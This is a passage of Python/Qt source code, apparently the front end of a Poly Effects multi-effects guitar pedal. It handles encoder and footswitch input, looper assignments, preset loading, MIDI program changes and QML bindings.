current_v+control\n print(\"#### current v \", current_v, effect_name, parameter)\n ingen_wrapper.spotlight_set(effect_name+\"/\"+parameter, current_v)\n self.spotlight_entries[i] = [effect_name, parameter, current_v]\n spotlight_entries_changed(effect_name, parameter, current_v, prev_v)\n\ndef spotlight_entries_changed(effect_name, parameter, cur_v, prev_v):\n # online \n # l, r, x, y are stored in a list for easy iteration\n cur_v = cur_v.replace(\"1\", \"\").replace(\"0\", \"\")\n prev_v = prev_v.replace(\"1\", \"\").replace(\"0\", \"\")\n added = set(cur_v) - set(prev_v)\n removed = set(prev_v) - set(cur_v)\n for control in added:\n spotlight_map[control].add((effect_name, parameter))\n for control in removed:\n 
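# spotlight_map drives handle_encoder_change below: each hardware control (\"l\", \"r\",\n # \"x\", \"y\") fans out to the set of (effect, parameter) pairs bound to it\n 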
spotlight_map[control].discard((effect_name, parameter))\n\ndef io_new_effect(effect_name, effect_type, x=20, y=30):\n # called by engine code when new effect is created\n # debug_print(\"from backend new effect\", effect_name, effect_type)\n if effect_type in effect_prototypes:\n current_effects[effect_name] = {\"x\": x, \"y\": y, \"effect_type\": effect_type,\n \"controls\": {},\n }\n\ndef add_io():\n ingen_wrapper.add_midi_input(\"/main/midi_in\", x=1192, y=(80 * 5))\n ingen_wrapper.add_midi_input2(\"/main/loop_midi_out\", x=1192, y=(80 * 6))\n ingen_wrapper.add_midi_output(\"/main/loop_extra_midi\", x=20, y=(80 * 3))\n ingen_wrapper.add_midi_output2(\"/main/midi_out\", x=-20, y=(80 * 5))\n if current_pedal_model.name == \"hector\":\n for i in range(1,7):\n ingen_wrapper.add_input(\"/main/in_\"+str(i), x=1192, y=(80*i))\n for i in range(1,9):\n ingen_wrapper.add_output(\"/main/out_\"+str(i), x=-20, y=(80 * i))\n else:\n for i in range(1,5):\n ingen_wrapper.add_input(\"/main/in_\"+str(i), x=1192, y=(80*i))\n for i in range(1,5):\n ingen_wrapper.add_output(\"/main/out_\"+str(i), x=-20, y=(80 * i))\n ingen_wrapper.add_output(\"/main/loop_common_in_1\", x=1092, y=(80*1))\n ingen_wrapper.add_output(\"/main/loop_common_in_2\", x=1092, y=(80*2))\n ingen_wrapper.add_input(\"/main/loop_common_out_1\", x=20, y=(80*1))\n ingen_wrapper.add_input(\"/main/loop_common_out_2\", x=20, y=(80*2))\n\nclass Encoder():\n # name, min, max, value\n def __init__(self, starteffect=\"\", startparameter=\"\", s_speed=1):\n self.effect = starteffect\n self.parameter = startparameter\n self.speed = s_speed\n self.rmin = 0\n self.rmax = 1\n self.is_loopler = False\n self.is_locked = False\n self.loop_index = -1\n\nknob_map = {\"left\": Encoder(s_speed=0.04), \"right\": Encoder(s_speed=0.8)}\nspotlight_map = {\"l\": set(), \"r\": set(), \"x\": set(), \"y\": set()}\n\ndef handle_encoder_change(is_left, change):\n # debug_print(is_left, change)\n # qDebug(\"encoder change \"+ str(is_left) + str(change))\n # increase or decrease the current knob value depending on knob speed\n # knob_value = knob_value + (change * knob_speed)\n normal_speed = 24.0\n knob = \"left\"\n knob_effect = knob_map[knob].effect\n knob_parameter = knob_map[knob].parameter\n\n # invert if we're running new style encoders\n\n if \"invert_enc\" in pedal_state and pedal_state[\"invert_enc\"]:\n is_left = not is_left\n change = change * -1\n if True: # qa_view:\n if is_left:\n qa_k = \"left\"\n else:\n qa_k = \"right\"\n value = encoder_qa[qa_k].value\n base_speed = 1 / normal_speed\n knob_speed = 5\n value = value + (change * knob_speed * base_speed)\n encoder_qa[qa_k].value = value\n # iterate over this knob in spotlight mapping if it exists\n spotlighted = {}\n if is_left:\n spotlighted = spotlight_map[\"l\"]\n else:\n spotlighted = spotlight_map[\"r\"]\n\n if is_left:\n knob_speed = knob_map[\"left\"].speed\n else:\n knob_speed = knob_map[\"right\"].speed\n # base speed * speed multiplier\n base_speed = (abs(knob_map[knob].rmin) + abs(knob_map[knob].rmax)) / normal_speed\n if len(spotlighted) > 0:\n for knob_effect, knob_parameter in spotlighted:\n value = current_effects[knob_effect][\"controls\"][knob_parameter].value\n value = value + (change * knob_speed * base_speed)\n knobs.ui_knob_change(knob_effect, knob_parameter, value)\n elif current_patchbay_mode == PatchMode.DETAILS:\n if not knob_effect or knob_effect not in current_effects and not knob_map[knob].is_loopler:\n return\n\n if knob_map[knob].is_loopler:\n 
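# loopler parameters are not tracked in current_effects, so the scaled delta\n # is handed to the loopler helper rather than knobs.ui_knob_change\n 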
loopler.change_from_knob(knob_effect, knob_parameter, knob_map[knob].loop_index, change, knob_speed * base_speed, knob_map[knob].rmin, knob_map[knob].rmax)\n else:\n value = current_effects[knob_effect][\"controls\"][knob_parameter].value\n value = value + (change * knob_speed * base_speed)\n\n # debug_print(\"knob value is\", value)\n # knob change handles clamping\n knobs.ui_knob_change(knob_effect, knob_parameter, value)\n\ndef set_bpm(bpm):\n current_bpm.value = bpm\n # host.transport_bpm(bpm)\n # send_ui_message(\"bpm_change\", (bpm, ))\n # debug_print(\"setting tempo\", bpm)\n\n### Assignable actions\n# \n\nActions = Enum(\"Actions\", \"\"\"set_value\nset_value_down\ntap\nset_tempo\ntoggle_pedal\nselect_preset\nnext_preset\nprevious_preset\nnext_action_group previous_action_group\ntoggle_effect\n\"\"\")\nfoot_action_groups = [{\"tap_up\":[Actions.set_value] , \"step_up\": [Actions.set_value], \"bypass_up\":[Actions.set_value],\n \"tap_down\":[Actions.set_value_down] , \"step_down\": [Actions.set_value_down], \"bypass_down\":[Actions.set_value_down],\n \"tap_step_up\": [Actions.set_value], \"step_bypass_up\": [Actions.set_value],\n \"tap_step_down\": [Actions.set_value_down], \"step_bypass_down\": [Actions.set_value_down]}]\n # \"tap_step_up\": [Actions.previous_preset], \"step_bypass_up\": [Actions.next_preset]}]\ncurrent_action_group = 0\n\ndef handle_bypass():\n # global bypass\n pedal_bypassed.value = not pedal_bypassed.value\n if pedal_bypassed.value:\n pedal_hardware.effect_off()\n else:\n pedal_hardware.effect_on()\n\ndef hide_foot_switch_warning():\n foot_switch_warning.value = False\n\ndef looper_footswitch_action(foot_switch_name):\n # command, value, set_all, global value, add loop, remove loop, \n # foot switches store command and arguments\n for action_params in looper_footswitch_assignments[foot_switch_name]:\n # getattr(loopler, \"cancel_midi_learn\")() \n print(\"command is \", action_params[0], \"params\", repr(action_params[1]))\n func = getattr(loopler, action_params[0])\n func(*action_params[1])\n return True\n return False\n\ndef send_to_footswitch_blocks(timestamp, switch_name, value=0):\n # send to all foot switch blocks\n # print(\"sending to switch_name \"+str(switch_name) + \"value\" + str(value))\n if \"tap_step\" in switch_name:\n foot_switch_name = \"foot_switch_d\"\n elif \"step_bypass\" in switch_name:\n foot_switch_name = \"foot_switch_e\"\n elif \"tap\" in switch_name:\n foot_switch_name = \"foot_switch_a\"\n elif \"step\" in switch_name:\n foot_switch_name = \"foot_switch_b\"\n elif \"bypass\" in switch_name:\n foot_switch_name = \"foot_switch_c\"\n\n trimmed_name = foot_switch_name[-1]\n # if we're in hold mode then we're assigning something to a foot switch\n if value == 0 and current_patchbay_mode == PatchMode.HOLD:\n # set this foot swtich to the currently held effect\n if current_selected_effect != \"\":\n if current_effects[current_selected_effect][\"assigned_footswitch\"].value == trimmed_name:\n ingen_wrapper.set_footswitch_control(current_selected_effect, \"\")\n else:\n ingen_wrapper.set_footswitch_control(current_selected_effect, foot_switch_name[-1])\n return\n\n # \n if value == 0 and loopler.current_command_params:\n # remove if currently assigned\n if looper_footswitch_assignments[foot_switch_name[-1]] == [list(loopler.current_command_params)]:\n looper_footswitch_assignments[foot_switch_name[-1]] = []\n ingen_wrapper.set_looper_footswitch(current_sub_graph.rstrip(\"/\"), json.dumps(looper_footswitch_assignments))\n 
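# persist the (possibly emptied) assignment with the graph, then clear the\n # pending looper command so the next footswitch press is handled normally\n 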
loopler.current_command_params = None\n else:\n looper_footswitch_assignments[foot_switch_name[-1]] = [loopler.current_command_params]\n # show foot switch selection screen, choose if for current loop, all loops, momentary, latching, toggle?\n # exclusive or adds on\n ingen_wrapper.set_looper_footswitch(current_sub_graph.rstrip(\"/\"), json.dumps(looper_footswitch_assignments))\n loopler.current_command_params = None\n return\n\n if True: # qa_view\n foot_switch_qa[foot_switch_name[-1]].value = value\n\n found_effect = False\n bpm = None\n if value == 1:\n bpm = handle_tap(foot_switch_name, timestamp)\n\n # toggle all assigned effects\n if value == 0:\n for effect_id in footswitch_assignments[trimmed_name]:\n enabled = current_effects[effect_id][\"enabled\"].value\n knobs.set_bypass(effect_id, not enabled) # toggle\n found_effect = True\n if looper_footswitch_action(trimmed_name):\n found_effect = True\n\n for effect_id, effect in current_effects.items():\n if \"foot_switch\" in effect[\"effect_type\"]:\n if foot_switch_name in effect_id:\n if bpm is not None:\n # qDebug(\"sending knob change from foot switch \"+effect_id + \"bpm\" + str(float(bpm)))\n knobs.ui_knob_change(effect_id, \"bpm\", float(bpm))\n # qDebug(\"sending knob change from foot switch \"+effect_id + \"value\" + str(float(value)))\n if effect[\"controls\"][\"latching\"].value < 0.9:\n effect[\"controls\"][\"cur_out\"].value = float(value)\n else:\n if value > 0:\n effect[\"controls\"][\"cur_out\"].value = 1.0 - effect[\"controls\"][\"cur_out\"].value\n knobs.ui_knob_change(effect_id, \"value\", float(value))\n found_effect = True\n\n if not found_effect and value == 0:\n if foot_switch_name == \"foot_switch_c\":\n handle_bypass()\n elif foot_switch_name == \"foot_switch_d\":\n if pedal_state[\"d_is_tuner\"] == True:\n toggle_tuner()\n else:\n previous_preset()\n elif foot_switch_name == \"foot_switch_e\":\n next_preset()\n # TODO add next / previous here\n else:\n # show you're pressing a footswitch that isn't connected to anything\n foot_switch_warning.value = True\n QTimer.singleShot(2500, hide_foot_switch_warning)\n\n\ndef next_preset():\n jump_to_preset(True, 1)\n\ndef previous_preset():\n jump_to_preset(True, -1)\n\ndef toggle_tuner():\n\n if is_loading.value == True:\n return\n preset_load_counter.value = preset_load_counter.value + 1\n\n if current_preset_filename == \"/mnt/presets/beebo/Tuner.ingen\":\n # if we've got a previous_preset, jump to it\n if previous_preset_filename != \"\":\n knobs.ui_load_preset_by_name(\"file://\"+previous_preset_filename)\n else:\n knobs.ui_load_preset_by_name(\"file:///mnt/presets/beebo/Tuner.ingen\")\n\ndef handle_foot_change(switch_name, timestamp):\n # debug_print(switch_name, timestamp)\n # qDebug(\"foot change \"+ str(switch_name) + str(timestamp))\n action = foot_action_groups[current_action_group][switch_name][0]\n params = None\n if len(foot_action_groups[current_action_group][switch_name]) > 1:\n params = foot_action_groups[current_action_group][switch_name][1:]\n\n if action is Actions.tap:\n pass\n elif action is Actions.toggle_pedal:\n handle_bypass()\n\n elif action is Actions.set_value:\n send_to_footswitch_blocks(timestamp, switch_name, 0)\n elif action is Actions.set_value_down:\n send_to_footswitch_blocks(timestamp, switch_name, 1)\n elif action is Actions.select_preset:\n pass\n\n elif action is Actions.next_preset:\n next_preset()\n\n elif action is Actions.previous_preset:\n previous_preset()\n\n elif action is Actions.toggle_effect:\n pass\n\nstart_tap_time = 
{\"foot_switch_a\":None, \"foot_switch_b\":None, \"foot_switch_c\":None, \"foot_switch_d\":None, \"foot_switch_e\":None}\n## tap callback is called by hardware button from the GPIO checking thread\ndef handle_tap(footswitch, timestamp):\n current_tap = timestamp\n bpm = None\n if start_tap_time[footswitch] is not None:\n # just use this and previous to calculate BPM\n # BPM must be in range 30-250\n d = current_tap - start_tap_time[footswitch]\n # 120 bpm, 0.5 seconds per tap\n bpm = 60 / d\n if bpm > 30 and bpm < 350:\n # set host BPM\n pass\n else:\n bpm = None\n\n # record start time\n start_tap_time[footswitch] = current_tap\n return bpm\n\ndef process_ui_messages():\n # pop from queue\n try:\n while not EXIT_PROCESS[0]:\n m = ui_messages.get(block=False)\n # debug_print(\"got ui message\", m)\n if m[0] == \"value_change\":\n # debug_print(\"got value change in process_ui\")\n effect_name_parameter, value = m[1:]\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n effect_type = current_effects[effect_name][\"effect_type\"]\n # debug_print(\"value set\", value, effect_type, parameter )\n if \"kill_dry\" in effect_prototypes[effect_type] and parameter == \"enabled\":\n # debug_print(\"kill dry value set\", value)\n current_effects[effect_name][\"enabled\"].value = bool(float(value))\n current_effects[effect_name][\"controls\"][parameter].value = float(value)\n except ValueError:\n pass\n\n elif m[0] == \"bpm_change\":\n current_bpm.value = m[1][0]\n elif m[0] == \"set_plugin_state\":\n pass\n # plugin_state[m[1][0]].value = m[1][1]\n elif m[0] == \"add_connection\":\n head, tail = m[1:]\n from_backend_add_connection(head, tail)\n elif m[0] == \"remove_connection\":\n head, tail = m[1:]\n from_backend_disconnect(head, tail)\n elif m[0] == \"add_plugin\":\n effect_name, effect_type, x, y, is_enabled = m[1:6]\n # debug_print(\"got add\", m)\n if (effect_name not in current_effects and (effect_type in inv_effect_type_map or effect_type in bare_ports)):\n # debug_print(\"adding \", m)\n if effect_type == \"http://polyeffects.com/lv2/polyfoot\":\n mapped_type = effect_name.rsplit(\"/\", 1)[1].rstrip(\"123456789\")\n if mapped_type in effect_type_map:\n from_backend_new_effect(effect_name, mapped_type, x, y, is_enabled)\n elif effect_type in bare_ports:\n if current_pedal_model.name == \"hector\":\n from_backend_new_effect(effect_name, effect_type, x, y, is_enabled)\n else:\n try:\n l_effect_num = int(effect_name.rsplit(\"/\", 1)[1][-1])\n except:\n l_effect_num = 0\n if l_effect_num < 5: # filter out Hector ports\n from_backend_new_effect(effect_name, effect_type, x, y, is_enabled)\n else:\n from_backend_new_effect(effect_name, inv_effect_type_map[effect_type], x, y, is_enabled)\n ingen_wrapper.get_state(\"/engine\")\n elif m[0] == \"remove_plugin\":\n effect_name = m[1]\n if (effect_name in current_effects):\n from_backend_remove_effect(effect_name)\n elif m[0] == \"enabled_change\":\n effect_name, is_enabled = m[1:]\n # debug_print(\"enabled changed \", m)\n if (effect_name in current_effects):\n # debug_print(\"adding \", m)\n current_effects[effect_name][\"enabled\"].value = bool(is_enabled)\n elif m[0] == \"pedalboard_loaded\":\n subgraph, file_name = m[1:]\n # disable loading sign\n print (\"pedalboard loaded\", subgraph, file_name, current_sub_graph)\n if subgraph == current_sub_graph.rstrip(\"/\"):\n is_loading.value = False\n done_loading_time = 
time.perf_counter()\n # check if we've got MIDI IO, if not add them\n print(\"### preset loaded in \", done_loading_time - preset_started_loading_time)\n debug_print(\"checking if MIDI exists\")\n if not (current_sub_graph+\"midi_in\" in current_effects):\n ingen_wrapper.add_midi_input(current_sub_graph+\"midi_in\", x=1192, y=(80 * 5))\n # debug_print(\"adding MIDI\")\n if not (current_sub_graph+\"midi_out\" in current_effects):\n ingen_wrapper.add_midi_output(current_sub_graph+\"midi_out\", x=-20, y=(80 * 5))\n if current_pedal_model.name == \"hector\" and not (current_sub_graph+\"out_5\" in current_effects):\n # add hector IO\n for i in range(5,7):\n ingen_wrapper.add_input(current_sub_graph+\"in_\"+str(i), x=1192, y=(80*i))\n for i in range(5,9):\n ingen_wrapper.add_output(current_sub_graph+\"out_\"+str(i), x=-20, y=(80 * i))\n patch_bay_notify.loading_preset_done.emit(current_sub_graph)\n\n elif m[0] == \"dsp_load\":\n max_load, mean_load, min_load = m[1:]\n dsp_load.rmin = min_load\n dsp_load.rmax = max_load\n dsp_load.value = mean_load + 0.25\n elif m[0] == \"set_comment\":\n description, subject = m[1:]\n preset_description.name = description\n elif m[0] == \"looper_footswitch\":\n footswitch, effect_name = m[1:]\n global looper_footswitch_assignments\n looper_footswitch_assignments = json.loads(footswitch)\n elif m[0] == \"assign_footswitch\":\n footswitch, effect_name = m[1:]\n if effect_name in current_effects:\n current_effects[effect_name][\"assigned_footswitch\"].value = footswitch\n # remove existing assignment if any\n for k in footswitch_assignments.keys():\n footswitch_assignments[k].discard(effect_name)\n if footswitch in footswitch_assignments:\n footswitch_assignments[footswitch].add(effect_name)\n elif m[0] == \"midi_pc\":\n program = m[1]\n jump_to_preset(False, program)\n elif m[0] == \"add_port\":\n pass\n elif m[0] == \"set_file\":\n effect_name, ir_file = m[1:]\n try:\n if (effect_name in current_effects) and (\"ir\" in current_effects[effect_name][\"controls\"]):\n if current_effects[effect_name][\"controls\"][\"ir\"].name != ir_file:\n current_effects[effect_name][\"controls\"][\"ir\"].name = ir_file\n effect_type = current_effects[effect_name][\"effect_type\"]\n if effect_type in [\"mono_reverb\", \"stereo_reverb\", \"quad_ir_reverb\"]:\n # debug_print(\"setting reverb file\", urllib.parse.unquote(ir_file))\n knobs.update_ir(effect_name, urllib.parse.unquote(ir_file))\n elif effect_type in [\"mono_cab\", \"stereo_cab\", \"quad_ir_cab\"]:\n knobs.update_ir(effect_name, urllib.parse.unquote(ir_file))\n elif effect_type in [\"amp_rtneural\", \"amp_nam\"]:\n knobs.update_json(effect_name, urllib.parse.unquote(ir_file))\n # debug_print(\"setting cab file\", urllib.parse.unquote(ir_file))\n # qDebug(\"setting knob file \" + ir_file)\n except ValueError:\n pass\n elif m[0] == \"remove_port\":\n pass\n elif m[0] == \"exit\":\n # global EXIT_PROCESS\n EXIT_PROCESS[0] = True\n elif m[0] == \"broadcast_update\":\n # debug_print(\"got value change in process_ui\")\n effect_name_parameter, value = m[1:]\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n effect_type = current_effects[effect_name][\"effect_type\"]\n # debug_print(\"value set\", value, effect_type, parameter )\n if \"kill_dry\" in effect_prototypes[effect_type] and parameter == \"enabled\":\n # debug_print(\"kill dry value set\", value)\n current_effects[effect_name][\"enabled\"].value = 
bool(float(value))\n current_effects[effect_name][\"controls\"][parameter].value = float(value)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"broadcast_ports\"]):\n current_effects[effect_name][\"broadcast_ports\"][parameter].value = float(value)\n # print(\"updated \", effect_name, parameter, value)\n except ValueError:\n pass\n elif m[0] == \"midi_learn\":\n # debug_print(\"got midi_learn in process_ui\")\n effect_name_parameter, value = m[1:]\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n current_effects[effect_name][\"controls\"][parameter].cc = int(value)\n # print(\"updated \", effect_name, parameter, value)\n except ValueError:\n pass\n elif m[0] == \"spotlight\":\n effect_name_parameter, value = m[1:]\n # debug_print(\"got spotlight in process_ui\", value)\n effect_name, parameter = effect_name_parameter.rsplit(\"/\", 1)\n try:\n if (effect_name in current_effects) and (parameter in current_effects[effect_name][\"controls\"]):\n if value != \"0\":\n # we're spotlighted\n if [effect_name, parameter, value] not in knobs.spotlight_entries:\n knobs.spotlight_entries.append([effect_name, parameter, value])\n spotlight_entries_changed(effect_name, parameter, value, '')\n else:\n # remove spotlight if found\n l_spotlight_entries = [b for b in knobs.spotlight_entries if b[0:2] == [effect_name, parameter]]\n if l_spotlight_entries != []:\n spotlight_entry = l_spotlight_entries[0]\n spotlight_entries_changed(spotlight_entry[0], spotlight_entry[1], '', spotlight_entry[2])\n knobs.spotlight_entries.remove(spotlight_entry)\n # print(\"updated \", effect_name, parameter, value)\n except ValueError:\n pass\n except queue.Empty:\n pass\n\n\n\n\neffect_type_map = {}\neffect_prototypes = {}\ninv_effect_type_map = {}\n\n\ndef set_available_effects():\n hidden_effects = [\"mix_vca\"]\n # add list is effect_category:effect_name\n effects = set(effect_type_map.keys()) - set(hidden_effects)\n cat_effects = [[], [], [], []]\n for e in effects:\n cat_effects[effect_prototypes[e][\"category\"]].append(e)\n # print(e)\n # # qDebug(e)\n # if \"category\" not in effect_prototypes[e]:\n # print(e)\n # qDebug(\"MISSING\")\n # qDebug(e)\n # print(e, str(effect_prototypes[e][\"category\"]))\n # cat_effects = sorted([str(effect_prototypes[e][\"category\"])+\":\"+e for e in effects])\n for i, a in enumerate(cat_effects):\n available_effects[i].setStringList(sorted(a))\n # available_effects.setStringList(list(effects))\n\ndef change_pedal_model(name, initial=False):\n _name = \"beebo\" # override\n global inv_effect_type_map\n global effect_type_map\n global effect_prototypes\n effect_type_map = effect_type_maps[_name]\n effect_prototypes = effect_prototypes_models[_name]\n\n set_available_effects()\n # context.setContextProperty(\"effectPrototypes\", effect_prototypes)\n accent_color_models = {\"beebo\": \"#FFA0E0\", \"digit\": \"#FFA0E0\", \"hector\": \"#32D2BE\"}\n accent_color.name = accent_color_models[name]\n\n inv_effect_type_map = {v:k for k, v in effect_type_map.items()}\n current_pedal_model.name = name\n load_preset_list()\n jump_to_preset(False, 0, initial)\n\ndef handle_MIDI_program_change():\n # This is pretty dodgy... 
but I don't want to depend on jack in the main process as it'll slow down startup\n # we need to wait here for ttymidi to be up\n ttymidi_found = False\n if IS_REMOTE_TEST:\n return\n while not ttymidi_found:\n a = subprocess.run([\"jack_lsp\", \"ttymidi\"], capture_output=True)\n if b\"ttymidi\" in a.stdout:\n ttymidi_found = True\n time.sleep(1)\n p = subprocess.Popen('jack_midi_dump', stdout=subprocess.PIPE)\n # Grab stdout line by line as it becomes available. This will loop until \n time.sleep(2)\n try:\n command = [\"/usr/bin/jack_connect\", \"ttymidi:MIDI_in\", \"midi-monitor:input\"]\n ret_var = subprocess.run(command)\n # check if MIDI thru is needed\n if pedal_state[\"thru\"] == True:\n command = [\"/usr/bin/jack_connect\", \"ttymidi:MIDI_in\", \"ttymidi:MIDI_out\"]\n ret_var = subprocess.run(command)\n except:\n pass\n # p terminates.\n while p.poll() is None:\n l = p.stdout.readline() # This blocks until it receives a newline.\n if len(l) > 8 and l[6] == b'c'[0]:\n b = l.decode()\n ig, b1, b2 = b.split()\n channel = int(\"0x\"+b1, 16) - 0xC0\n program = int(\"0x\"+b2, 16)\n # debug_print(channel, program)\n if channel == midi_channel.value - 1: # our channel\n # put this in the queue\n ui_messages.put((\"midi_pc\", program))\n # When the subprocess terminates there might be unconsumed output \n # that still needs to be processed.\n ignored = p.stdout.read()\n\nif __name__ == \"__main__\":\n\n debug_print(\"in Main\")\n app = QGuiApplication(sys.argv)\n QIcon.setThemeName(\"digit\")\n QFontDatabase.addApplicationFont(\"qml/fonts/BarlowSemiCondensed-SemiBold.ttf\")\n font = QFont(\"BarlowSemiCondensed\", 20, QFont.DemiBold)\n app.setFont(font)\n\n # preset might not have been copied on an update, as file system might not have been supported\n if not os.path.isfile(\"/mnt/presets/beebo/Empty.ingen/main.ttl\") and not IS_REMOTE_TEST:\n # rsync\n command = \"sudo rsync -a /to_nor_flash/ /nor_flash\"\n ret_var = subprocess.call(command, shell=True)\n\n if os.path.isfile(\"/mnt/presets/digit/Empty.ingen/main.ttl\") and not IS_REMOTE_TEST:\n # first time running after merge update\n command = \"mv -f /mnt/presets/digit/* /mnt/presets/beebo/;rm -rf /mnt/presets/digit/*\"\n ret_var = subprocess.call(command, shell=True)\n get_meta_from_files(True)\n\n # Instantiate the Python object.\n knobs = Knobs()\n loopler = loopler_lib.Loopler()\n\n\n # read persistant state\n pedal_state = {}\n load_pedal_state()\n current_bpm = PolyValue(\"BPM\", 120, 30, 250) # bit of a hack\n current_preset = PolyValue(\"Default Preset\", 0, 0, 127)\n preset_load_counter = PolyValue(\"\", 0, 0, 500000)\n current_preset_filename = \"\"\n previous_preset_filename = \"\"\n update_counter = PolyValue(\"\", 0, 0, 500000)\n command_status = [PolyValue(\"\", -1, -10, 100000), PolyValue(\"\", -1, -10, 100000)]\n delay_num_bars = PolyValue(\"Num bars\", 1, 1, 16)\n dsp_load = PolyValue(\"DSP Load\", 0, 0, 0.3)\n foot_switch_qa = {\"a\":PolyValue(\"a\", 0, 0, 1), \"b\":PolyValue(\"b\", 0, 0, 1), \"c\":PolyValue(\"c\", 0, 0, 1), \"d\":PolyValue(\"d\", 0, 0, 1), \"e\":PolyValue(\"e\", 0, 0, 1)}\n encoder_qa = {\"left\":PolyValue(\"a\", 0, 0, 1), \"right\":PolyValue(\"b\", 0, 0, 1)}\n connect_source_port = PolyValue(\"\", 1, 1, 16) # for sharing what type the selected source is\n midi_channel = PolyValue(\"channel\", pedal_state[\"midi_channel\"], 1, 16)\n input_level = PolyValue(\"input level\", pedal_state[\"input_level\"], -80, 10)\n preset_description = PolyValue(\"tap to write description\", 0, 0, 1)\n 
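    # --- Editor's note (illustrative sketch, not part of the original app) ---
    # `PolyValue` is defined elsewhere in this repo and not shown in this file;
    # it is used above as a small observable value holder with a name and a
    # [rmin, rmax] range that QML can bind to. Assuming the project uses
    # PySide2 (it instantiates QGuiApplication/QTimer), a minimal stand-in with
    # the same shape could look roughly like this -- the class and method names
    # below are ours, not the project's:
    from PySide2.QtCore import QObject, Signal, Property

    class PolyValueSketch(QObject):
        value_changed = Signal()

        def __init__(self, name, value, rmin, rmax, parent=None):
            super().__init__(parent)
            self.name = name
            self.rmin = rmin
            self.rmax = rmax
            self._value = value

        def _get_value(self):
            return self._value

        def _set_value(self, v):
            # clamp writes into [rmin, rmax] so QML cannot push the model out
            # of its declared range, then notify any bound QML items
            self._value = max(self.rmin, min(self.rmax, v))
            self.value_changed.emit()

        value = Property(float, _get_value, _set_value, notify=value_changed)
    # --- end editor's note ---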
debug_print(\"### Input level is\", input_level.value)\n knobs.set_input_level(pedal_state[\"input_level\"], write=False)\n pedal_bypassed = PolyBool(False)\n is_loading = PolyBool(False)\n foot_switch_warning = PolyBool(False)\n is_l_to_r = PolyBool(pedal_state[\"l_to_r\"])\n preset_meta_data = {}\n favourites = {}\n load_preset_meta_cache()\n load_favourites_data()\n module_browser_model_s = module_browser_model.ModuleBrowserModel(favourites)\n preset_browser_model_s = preset_browser_model.PresetBrowserModel(preset_meta_data, favourites, pedal_state[\"author\"])\n amp_browser_model_s = amp_browser_model.AmpBrowserModel({\"nam\": [], \"amp\": []}, knobs)\n # ir_browser_model_s = ir_browser_model.irBrowserModel({\"reverbs\": [], \"cabs\": []}, knobs)\n\n patch_bay_notify = PatchBayNotify()\n\n available_effects = [QStringListModel() for i in range(4)]\n set_available_effects()\n qmlRegisterType(ir_browser_model.irBrowserModel, \"ir_browser_module\", 1, 0, \"IrBrowserModel\")\n engine = QQmlApplicationEngine()\n\n current_pedal_model = PolyValue(pedal_state[\"model\"], 0, -1, 1)\n # accent_color = PolyValue(\"#8BB8E8\", 0, -1, 1)\n accent_color = PolyValue(\"#FF75D0\", 0, -1, 1)\n current_ip = PolyValue(\"\", 0, -1, 1)\n\n # Expose the object to QML.\n # global context\n context = engine.rootContext()\n context.setContextProperty(\"knobs\", knobs)\n context.setContextProperty(\"loopler\", loopler)\n context.setContextProperty(\"module_browser_model\", module_browser_model_s)\n context.setContextProperty(\"preset_browser_model\", preset_browser_model_s)\n context.setContextProperty(\"amp_browser_model\", amp_browser_model_s)\n # context.setContextProperty(\"ir_browser_model\", ir_browser_model_s)\n change_pedal_model(pedal_state[\"model\"], True)\n context.setContextProperty(\"available_effects\", available_effects)\n context.setContextProperty(\"selectedSourceEffectPorts\", selected_source_effect_ports)\n context.setContextProperty(\"selectedDestEffectPorts\", selected_dest_effect_ports)\n context.setContextProperty(\"portConnections\", port_connections)\n # context.setContextProperty(\"effectPrototypes\", effect_prototypes)\n context.setContextProperty(\"updateCounter\", update_counter)\n context.setContextProperty(\"presetCounter\", preset_load_counter)\n context.setContextProperty(\"currentBPM\", current_bpm)\n context.setContextProperty(\"dspLoad\", dsp_load)\n context.setContextProperty(\"isPedalBypassed\", pedal_bypassed)\n context.setContextProperty(\"currentPreset\", current_preset)\n context.setContextProperty(\"commandStatus\", command_status)\n context.setContextProperty(\"delayNumBars\", delay_num_bars)\n context.setContextProperty(\"connectSourcePort\", connect_source_port)\n context.setContextProperty(\"midiChannel\", midi_channel)\n context.setContextProperty(\"isLoading\", is_loading)\n context.setContextProperty(\"inputLevel\", input_level)\n context.setContextProperty(\"currentPedalModel\", current_pedal_model)\n context.setContextProperty(\"accent_color\", accent_color)\n context.setContextProperty(\"presetList\", preset_list_model)\n context.setContextProperty(\"footSwitchQA\", foot_switch_qa)\n context.setContextProperty(\"encoderQA\", encoder_qa)\n context.setContextProperty(\"footSwitchWarning\", foot_switch_warning)\n context.setContextProperty(\"lToR\", is_l_to_r)\n context.setContextProperty(\"preset_description\", preset_description)\n context.setContextProperty(\"patchBayNotify\", patch_bay_notify)\n context.setContextProperty(\"favourites\", favourites)\n 
context.setContextProperty(\"pedalState\", pedal_state)\n context.setContextProperty(\"currentIP\", current_ip)\n engine.load(QUrl(\"qml/TopLevelWindow.qml\"))\n debug_print(\"starting send thread\")\n ingen_wrapper.start_send_thread()\n debug_print(\"starting recv thread\")\n ingen_wrapper.start_recv_thread(ui_messages)\n\n pedal_hardware.foot_callback = handle_foot_change\n pedal_hardware.encoder_change_callback = handle_encoder_change\n pedal_hardware.add_hardware_listeners()\n knobs.launch_task(0.5, handle_MIDI_program_change)\n\n # qWarning(\"logging with qwarning\")\n try:\n add_io()\n except Exception as e:\n debug_print(\"########## e1 is:\", e)\n ex_type, ex_value, tb = sys.exc_info()\n error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n debug_print(\"EXception is:\", error)\n sys.exit()\n\n sys._excepthook = sys.excepthook\n def exception_hook(exctype, value, tb):\n debug_print(\"except hook got a thing!\")\n traceback.print_exception(exctype, value, tb)\n sys._excepthook(exctype, value, tb)\n # sys.exit(1)\n sys.excepthook = exception_hook\n # try:\n # crash_here\n # except:\n # debug_print(\"caught crash\")\n # timer = QTimer()\n # timer.timeout.connect(tick)\n # timer.start(1000)\n\n def signalHandler(sig, frame):\n if sig in (SIGINT, SIGTERM):\n qWarning(\"frontend got signal\")\n # global EXIT_PROCESS\n EXIT_PROCESS[0] = True\n ingen_wrapper._FINISH = True\n ingen_wrapper.ingen._FINISH = True\n 